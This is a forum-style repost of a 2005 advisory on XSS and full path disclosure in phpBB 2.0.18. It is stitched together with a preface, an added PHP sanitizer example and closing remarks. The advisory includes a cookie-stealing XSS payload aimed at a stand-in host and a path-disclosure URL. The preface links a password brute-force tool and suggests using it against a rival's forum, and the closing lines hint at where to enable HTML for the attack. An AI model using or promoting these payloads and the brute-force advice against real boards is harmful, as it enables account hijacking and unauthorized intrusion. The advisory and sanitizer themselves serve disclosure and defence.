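phpBB 2.0.18 XSS and Full Path Disclosure
Details: Security Alert
There is also a brute-force tool, single-threaded, and not of much use; if a love rival really has set up some phpBB board or the like, you could use it to run passwords.
Download: http://ftpzhangxue.w205.100dns.com/tools/phpbb.rar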
Topic: phpBB 2.0.18 XSS and Full Path Disclosure
Security Alert Id: 269
Security Risk: Low
Remote Exploit: Yes
Local Exploit: No
Exploit Given: Yes
Credit: Maksymilian Arciemowicz
Date: 17.12.2005
Affected Software: phpBB <= 2.0.18
Advisory Text:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 16.12.2005
from securityreason.com TEAM
--- 0. Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.
Contact with author http://www.phpbb.com/about.php.
--- 1. XSS ---
If in phpbb is Allowed HTML tags "ON" like b, i, u, pre and have you in profile "Always allow HTML: YES" or are you Guest
that you can use this tags:
<B C=">" onmouseover="alert('SecurityReason.Com')" X="<B">HELO</B>
Exploit:
<B C=">" onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)" X="<B">HALO</B>
and have you cookies.
--- 2. Full Path Disclosure ---
In file admin/admin_disallow.php is
--25-31---
if( !empty($setmodules) )
{
	$filename = basename(__FILE__);
	$module['Users']['Disallow'] = append_sid($filename);
	return;
}
--25-31---
function append_sid() doesn't exist. And if you have:
register_globals=On
display_errors=On
Try to go:
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1
-- RESULT ERROR ---
Fatal error: Call to undefined function: append_sid() in /www/2018/phpBB2/admin/admin_disallow.php on line 28
-- RESULT ERROR ---
--- 3. Greets ---
sp3x
--- 4. Contact ---
Author: Maksymilian Arciemowicz <cXIb8O3>
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
securityreason.com TEAM
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)
iD8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D
/0u14EN2sQAh1Bwu0yvT48Q=
=lsL8
-----END PGP SIGNATURE-----
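
An added example, not taken from the advisory or from phpBB's code: one way to render posts so that the quoted-attribute trick in section 1 has no effect, by escaping the whole post and then re-enabling only bare, attribute-free tags. The function name render_post_html, the ALLOWED_TAGS constant and the sample strings are assumptions made for illustration.

```php
<?php
// Added example, not phpBB code. Tag list mirrors the advisory's "b, i, u, pre".
const ALLOWED_TAGS = ['b', 'i', 'u', 'pre'];

// Escape everything first, then re-enable only bare, attribute-free allowed
// tags. No attribute ever reaches the output, so a ">" hidden inside a quoted
// attribute value cannot end a tag early and smuggle in an event handler.
function render_post_html(string $text): string
{
    $escaped = htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
    $names   = implode('|', ALLOWED_TAGS);
    $open    = [];                      // stack of currently open allowed tags

    $out = preg_replace_callback(
        "~&lt;(/?)($names)&gt;~i",
        function (array $m) use (&$open): string {
            $tag = strtolower($m[2]);
            if ($m[1] === '') {         // opening tag: remember it
                $open[] = $tag;
                return "<$tag>";
            }
            if (end($open) === $tag) {  // close matches the innermost open tag
                array_pop($open);
                return "</$tag>";
            }
            return $m[0];               // stray close: leave it escaped
        },
        $escaped
    );

    // Close whatever the author left open so markup cannot leak into the page.
    while ($open) {
        $out .= '</' . array_pop($open) . '>';
    }
    return $out;
}

// Constructed samples: the advisory's proof-of-concept string and a benign post.
$samples = [
    '<B C=">" onmouseover="alert(\'SecurityReason.Com\')" X="<B">HELO</B>',
    'plain <b>bold <i>nested</i></b> text',
];
foreach ($samples as $s) {
    echo render_post_html($s), PHP_EOL;
}
```

The first sample comes out as inert escaped text with no live tag at all, while the second keeps its b and i formatting.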
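Oh, right, the one at the very top seems, maybe, probably, I guess, to mean this:
Signature:
The signature you enter is automatically appended to the bottom of the posts you publish. Signatures are limited to 512 characters.
HTML tags disabled
Style tags allowed
Emoticons allowed
Find where you can "allow HTML tags"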